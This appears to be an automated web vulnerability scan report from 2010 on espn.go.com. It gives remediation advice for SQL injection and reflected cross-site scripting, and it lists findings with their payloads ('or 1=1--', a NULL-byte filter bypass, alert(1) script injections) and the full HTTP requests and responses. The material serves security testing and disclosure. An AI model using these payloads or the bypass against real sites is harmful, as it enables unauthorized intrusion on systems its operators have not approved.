SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.
Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.
Issue remediation
The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.
You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:
One common defense is to double up any single quotation marks appearing within user input before incorporating that input into a SQL query. This defense is designed to prevent malformed data from terminating the string in which it is inserted. However, if the data being incorporated into queries is numeric, then the defense may fail, because numeric data may not be encapsulated within quotes, in which case only a space is required to break out of the data context and interfere with the query. Further, in second-order SQL injection attacks, data that has been safely escaped when initially inserted into the database is subsequently read from the database and then passed back to it again. Quotation marks that have been doubled up initially will return to their original form when the data is reused, allowing the defense to be bypassed.
Another often cited defense is to use stored procedures for database access. While stored procedures can provide security benefits, they are not guaranteed to prevent SQL injection attacks. The same kinds of vulnerabilities that arise within standard dynamic SQL queries can arise if any SQL is dynamically constructed within stored procedures. Further, even if the procedure is sound, SQL injection can arise if the procedure is invoked in an unsafe manner using user-controllable data.
1.1. http://espn.go.com/espn/fp/pollDataGenUniversal [name of an arbitrarily supplied request parameter]next
Summary
Severity:
High
Confidence:
Tentative
Host:
http://espn.go.com
Path:
/espn/fp/pollDataGenUniversal
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 11430324'%20or%201%3d1--%20 and 11430324'%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
HTTP/1.1 200 OK Cache-Control: max-age=15 Date: Sat, 06 Nov 2010 14:18:19 GMT Content-Type: text/html; charset=utf-8 Last-Modified: Sat, 06 Nov 2010 14:18:19 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN18 Cache-Expires: Sat, 06 Nov 2010 14:20:29 GMT Content-Length: 647 X-UA-Compatible: IE=EmulateIE7
HTTP/1.1 200 OK Cache-Control: max-age=15 Date: Sat, 06 Nov 2010 14:18:03 GMT Content-Type: text/html; charset=utf-8 Last-Modified: Sat, 06 Nov 2010 14:18:03 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN31 Cache-Expires: Sat, 06 Nov 2010 14:20:18 GMT Content-Length: 668 X-UA-Compatible: IE=EmulateIE7
The userAB cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the userAB cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /ncf/conversation HTTP/1.1 Host: espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289100691517_533924%22%2C%22pv%22%3A1%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fespn.go.com%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%7D; jt_time=1289100691490; s_sess=%20s_ppv%3D95%3B; fsr.a=1289100690678; CRBLM_LAST_UPDATE=1289019281; userAB=7%00'; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020738304%7C1383628738304%3B%20s_c24_s%3DFirst%2520Visit%7C1289022538304%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022538320%3B; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=40C651A1-56EE-4BD7-BAD0-16B429463C17; SEEN2=cAMLBtEOcAMLBtEOcAMLBtEO:;
Response 1 (redirected)
HTTP/1.1 200 OK Date: Sun, 07 Nov 2010 07:38:01 GMT Content-Type: text/html; charset=iso-8859-1 Accept-Ranges: bytes Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN08 Cache-Expires: Sun, 07 Nov 2010 07:37:58 GMT Content-Length: 207750 Cache-Control: no-cache Pragma: no-cache Connection: close X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... amp;drop=0&addata=1331:55041:707559:55041&a=1&goto=http://www.eyewonderlabs.com/ct.cfm?ewbust=0&guid=0&ewadid=118859&eid=1349731&file=http://cdn.eyewonder.com/100125/764524/1349731/NOSCRIPTfailover.jpg&pnl=MainBanner&type=0&name=Clickthru-NOSCRIPT&num=1&time=0&diff=0&clkX=&clkY=&click=http://clk.redcated/IWC/go/257161980/direct/01/" target="_blank"> ...[SNIP]...
Request 2
GET /ncf/conversation HTTP/1.1 Host: espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289100691517_533924%22%2C%22pv%22%3A1%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fespn.go.com%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%7D; jt_time=1289100691490; s_sess=%20s_ppv%3D95%3B; fsr.a=1289100690678; CRBLM_LAST_UPDATE=1289019281; userAB=7%00''; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020738304%7C1383628738304%3B%20s_c24_s%3DFirst%2520Visit%7C1289022538304%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022538320%3B; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=40C651A1-56EE-4BD7-BAD0-16B429463C17; SEEN2=cAMLBtEOcAMLBtEOcAMLBtEO:;
Response 2 (redirected)
HTTP/1.1 200 OK Date: Sun, 07 Nov 2010 07:38:03 GMT Content-Type: text/html; charset=iso-8859-1 Accept-Ranges: bytes Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN22 Cache-Expires: Sun, 07 Nov 2010 07:37:59 GMT Content-Length: 205170 Cache-Control: no-cache Pragma: no-cache Connection: close X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]...
2. Cross-site scripting (reflected)previousnext There are 16 instances of this issue:
Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Remediation background
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
The value of the adminOver request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a0933"%3balert(1)//f1709e21753 was submitted in the adminOver parameter. This input was echoed as a0933";alert(1)//f1709e21753 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 14:21:59 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 14:21:59 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN14 Cache-Expires: Sat, 06 Nov 2010 14:30:19 GMT X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding Connection: Keep-Alive Content-Length: 1371
The value of the autostart request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 59854"%3balert(1)//cc78248a523 was submitted in the autostart parameter. This input was echoed as 59854";alert(1)//cc78248a523 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 14:23:20 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 14:23:20 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN10 Cache-Expires: Sat, 06 Nov 2010 14:31:40 GMT X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding Connection: Keep-Alive Content-Length: 1371
The value of the player request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fb4ee"%3balert(1)//e664ff0054e was submitted in the player parameter. This input was echoed as fb4ee";alert(1)//e664ff0054e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 14:20:43 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 14:20:43 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN18 Cache-Expires: Sat, 06 Nov 2010 14:29:03 GMT X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding Connection: Keep-Alive Content-Length: 1399
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 42000"><img%20src%3da%20onerror%3dalert(1)>f1469c47fb3 was submitted in the REST URL parameter 5. This input was echoed as 42000"><img src=a onerror=alert(1)>f1469c47fb3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /espn3/index/_/sport/basketball42000"><img%20src%3da%20onerror%3dalert(1)>f1469c47fb3 HTTP/1.1 Host: espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289100691517_533924%22%2C%22pv%22%3A1%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fespn.go.com%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%7D; jt_time=1289100691490; s_sess=%20s_ppv%3D95%3B; fsr.a=1289100690678; CRBLM_LAST_UPDATE=1289019281; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020738304%7C1383628738304%3B%20s_c24_s%3DFirst%2520Visit%7C1289022538304%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022538320%3B; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=40C651A1-56EE-4BD7-BAD0-16B429463C17; SEEN2=cAMLBtEOcAMLBtEOcAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sun, 07 Nov 2010 06:23:25 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sun, 07 Nov 2010 06:23:25 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN03 Cache-Expires: Sun, 07 Nov 2010 06:31:45 GMT Content-Length: 772619 Connection: close X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta http ...[SNIP]... <meta name="description" CONTENT="Enjoy live streaming Basketball42000"><img src=a onerror=alert(1)>f1469c47fb3 online on ESPN3.com. Never miss a game!" /> ...[SNIP]...
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 75580'%3b056a2319ce8 was submitted in the REST URL parameter 5. This input was echoed as 75580';056a2319ce8 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /espn3/index/_/sport/basketball75580'%3b056a2319ce8 HTTP/1.1 Host: espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289100691517_533924%22%2C%22pv%22%3A1%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fespn.go.com%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%7D; jt_time=1289100691490; s_sess=%20s_ppv%3D95%3B; fsr.a=1289100690678; CRBLM_LAST_UPDATE=1289019281; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020738304%7C1383628738304%3B%20s_c24_s%3DFirst%2520Visit%7C1289022538304%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022538320%3B; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=40C651A1-56EE-4BD7-BAD0-16B429463C17; SEEN2=cAMLBtEOcAMLBtEOcAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sun, 07 Nov 2010 06:23:50 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sun, 07 Nov 2010 06:23:50 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN11 Cache-Expires: Sun, 07 Nov 2010 06:32:10 GMT Content-Length: 772479 Connection: close X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta http ...[SNIP]... <script type="text/javascript"> anTrackESPN3(0,'espn3',ud.name,'','','index','index',ud.name,'','en','basketball75580';056a2319ce8','');
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8a7a3"><img%20src%3da%20onerror%3dalert(1)>00551600c81 was submitted in the REST URL parameter 5. This input was echoed as 8a7a3"><img src=a onerror=alert(1)>00551600c81 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /espn3/index/_/sport/football8a7a3"><img%20src%3da%20onerror%3dalert(1)>00551600c81 HTTP/1.1 Host: espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289009464375_547728%22%2C%22pv%22%3A11%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsports.espn.go.com%2Ftravel%2Fstadium%2FstadiumIndex%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A13%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289009484661%7D; jt_time=1289009663813; s_sess=%20s_ppv%3D99%3B%20s_v3%3D2009_STREAK_PAGE1%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289009661845; DETECT=1.0.0&90557&15933611&1&1; ESPN360beta=betaSet; CRBLM_LAST_UPDATE=1289009493; lang=en; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289009690492%7C1383617690492%3B%20s_c24_s%3DFirst%2520Visit%7C1289011490492%3B%20s_gpv_pn%3Dfantasy%253Apoker%253Apokerpickem%253Afrontpage%7C1289011490524%3B; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A5CA5050108F8-60000103A00026F2[CE]; espnAffiliate=invalid; CRBLM=CBLM-001:; SWID=EA8944C6-BBF0-4547-91B6-3EA6AF834987; SEEN2=JxMLA9EOJxMLA9EO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 03:39:30 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 03:39:30 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN01 Cache-Expires: Sat, 06 Nov 2010 03:47:49 GMT Content-Length: 788700 Connection: close X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta http ...[SNIP]... <meta name="description" CONTENT="Enjoy live streaming Football8a7a3"><img src=a onerror=alert(1)>00551600c81 online on ESPN3.com. Never miss a game!" /> ...[SNIP]...
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 73637'%3ba4928c70f34 was submitted in the REST URL parameter 5. This input was echoed as 73637';a4928c70f34 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /espn3/index/_/sport/football73637'%3ba4928c70f34 HTTP/1.1 Host: espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289009464375_547728%22%2C%22pv%22%3A11%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsports.espn.go.com%2Ftravel%2Fstadium%2FstadiumIndex%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A13%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289009484661%7D; jt_time=1289009663813; s_sess=%20s_ppv%3D99%3B%20s_v3%3D2009_STREAK_PAGE1%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289009661845; DETECT=1.0.0&90557&15933611&1&1; ESPN360beta=betaSet; CRBLM_LAST_UPDATE=1289009493; lang=en; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289009690492%7C1383617690492%3B%20s_c24_s%3DFirst%2520Visit%7C1289011490492%3B%20s_gpv_pn%3Dfantasy%253Apoker%253Apokerpickem%253Afrontpage%7C1289011490524%3B; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A5CA5050108F8-60000103A00026F2[CE]; espnAffiliate=invalid; CRBLM=CBLM-001:; SWID=EA8944C6-BBF0-4547-91B6-3EA6AF834987; SEEN2=JxMLA9EOJxMLA9EO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 03:39:28 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 03:39:28 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN12 Cache-Expires: Sat, 06 Nov 2010 03:47:48 GMT Content-Length: 788560 Connection: close X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta http ...[SNIP]... <script type="text/javascript"> anTrackESPN3(0,'espn3',ud.name,'','','index','index',ud.name,'','en','football73637';a4928c70f34','');
The value of the pageType request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ae11a"%3balert(1)//70dba98dd9 was submitted in the pageType parameter. This input was echoed as ae11a";alert(1)//70dba98dd9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the adminOver request parameter is copied into the XML document as plain text between tags. The payload 89c9d<a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>99ff36eea82 was submitted in the adminOver parameter. This input was echoed as 89c9d<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>99ff36eea82 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The response into which the attack is echoed contains XML data, which is not by default processed by the browser as HTML. However, by injecting XML elements which create a new namespace it is possible to trick some browsers (including Firefox) into processing part of the response as HTML. Note that this proof-of-concept attack is designed to execute when processed by the browser as a standalone response, not when the XML is consumed by a script within another page.
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 14:17:38 GMT Content-Type: text/xml;charset=UTF-8 Last-Modified: Sat, 06 Nov 2010 14:17:38 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN20 Cache-Expires: Sat, 06 Nov 2010 14:25:58 GMT X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding Connection: Keep-Alive Content-Length: 6403
The value of the height request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f548a'%3balert(1)//361c204b438 was submitted in the height parameter. This input was echoed as f548a';alert(1)//361c204b438 in the application's response.
